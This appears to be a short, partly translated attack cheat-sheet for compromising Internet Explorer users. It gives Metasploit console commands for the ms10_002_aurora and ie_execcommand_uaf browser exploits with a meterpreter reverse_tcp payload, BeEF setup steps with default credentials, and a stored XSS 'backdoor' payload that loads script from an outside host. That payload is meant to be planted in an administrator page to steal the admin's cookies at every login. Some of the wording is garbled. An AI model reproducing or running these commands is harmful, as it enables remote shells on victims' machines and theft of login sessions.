(ie6 xp)
kali 1.0 comes with beef and msf
cd /usr/share/beef-xss
./beef
Access UI url, account password is beef
Configure msf
msfconsole
use windows/browser/ms10_002_aurora
set PAYLOAD windows / meterpreter / reverse_tcp connect back
set SRVHOST ip address The target address accessed by the client
set SRVPOST 7777
set URIPATH /
set LHOST ip address Locally received address
set LPORT 4444
exploit
Then we will generate an address that we set: ip: 7777, which is the url to be accessed by users.
After the vulnerability is triggered, we will return to our address: ip: 4444
Beef can be heard at this time
msf: sessions -i
sessions -i -
shell
(ie 7\8\9)
use exploit / windows / browser / ie_execcommand_uaf
set SRVHOST ip
set SRVPOST 8888
set URIPATH /
exploit
留后门:</tExtArEa>'"><sCRiPt sRC=//xsshs.cn/2rQH></sCrIpT>
Put this code in the administrator page.
After that, the administrator can get cookies every time he logs in.
xss scanning tool: wvs \ coconut tree \ safe3 \ Xelenium \ w3af \ vega \ xss scanning plug-in + burp